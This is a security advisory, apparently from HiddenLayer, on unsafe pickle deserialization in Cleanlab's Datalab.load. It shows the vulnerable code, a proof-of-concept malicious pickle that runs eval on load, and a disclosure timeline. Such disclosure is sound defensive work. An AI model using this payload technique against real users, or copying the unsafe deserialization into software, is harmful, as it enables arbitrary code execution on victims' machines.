Unsafe deserialization in Datalab leads to arbitrary code execution
September 12, 2024

Products Impacted
This vulnerability exists in versions v2.4.0 or newer of Cleanlab.
CVSS Score: 7.8
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data
Details
To exploit this vulnerability, an attacker creates a directory, places a malicious file named datalab.pkl in it, and sends the directory to a victim. When the victim loads the directory with Datalab.load, the vulnerable code runs. The vulnerability exists in the deserialize function of the _Serializer class in cleanlab/datalab/internal/serialize.py (shown below).
@classmethod
def deserialize(cls, path: str, data: Optional[Dataset] = None) -> Datalab:
    """Deserializes the datalab object from disk."""
    if not os.path.exists(path):
        raise ValueError(f"No folder found at specified path: {path}")
    with open(os.path.join(path, OBJECT_FILENAME), "rb") as f:
        datalab: Datalab = pickle.load(f)
    cls._validate_version(datalab)
    # Load the issues from disk.
    issues_path = os.path.join(path, ISSUES_FILENAME)
    if not hasattr(datalab.data_issues, "issues") and os.path.exists(issues_path):
        datalab.data_issues.issues = pd.read_csv(issues_path)
    issue_summary_path = os.path.join(path, ISSUE_SUMMARY_FILENAME)
    if not hasattr(datalab.data_issues, "issue_summary") and os.path.exists(issue_summary_path):
        datalab.data_issues.issue_summary = pd.read_csv(issue_summary_path)
    if data is not None:
        if hash(data) != hash(datalab._data):
            raise ValueError(
                "Data has been modified since Lab was saved. "
                "Cannot load Lab with modified data."
            )
        if len(data) != len(datalab.labels):
            raise ValueError(
                f"Length of data ({len(data)}) does not match length of labels ({len(datalab.labels)})"
            )
        datalab._data = Data(data, datalab.task, datalab.label_name)
        datalab.data = datalab._data._data
    return datalab

The above code is called by the Datalab.load function shown below.
@staticmethod
def load(path: str, data: Optional[Dataset] = None) -> "Datalab":
    """Loads Datalab object from a previously saved folder.
    Parameters
    ----------
    `path` :
        Path to the folder previously specified in ``Datalab.save()``.
    `data` :
        The dataset used to originally construct the Datalab.
        Remember the dataset is not saved as part of the Datalab,
        you must save/load the data separately.
    Returns
    -------
    `datalab` :
        A Datalab object that is identical to the one originally saved.
    """
    datalab = _Serializer.deserialize(path=path, data=data)
    load_message = f"Datalab loaded from folder: {path}"
    print(load_message)
    return datalab

When the user loads a directory containing the maliciously crafted pickle file, Datalab.load calls the _Serializer.deserialize class method, which opens the datalab.pkl file in that directory and passes it to pickle.load. An example attack is shown below. First, we create the exploit directory containing the malicious pickle file.
import os
import pickle

class Exploit:
    def __reduce__(self):
        # On unpickling, pickle calls eval("print('pwned')")
        return (eval, ("print('pwned')",))

os.makedirs("./exploit", exist_ok=True)
with open("./exploit/datalab.pkl", "wb") as f:
    f.write(pickle.dumps(Exploit()))

Once the file has been created, the vulnerability can be exploited by having the user load the malicious directory:
from cleanlab import Datalab
Datalab.load("./exploit")

Once the user runs this, the arbitrary code is executed on their system.
Timeline
July 11, 2024: Vendor disclosure via the process outlined in the project's security page
September 6, 2024: Followed up with the vendor to let them know we planned to publish on September 12, 2024
September 12, 2024: Public disclosure
Project URL
https://github.com/cleanlab/cleanlab
Researcher: Kasimir Schulz, Principal Security Researcher, HiddenLayer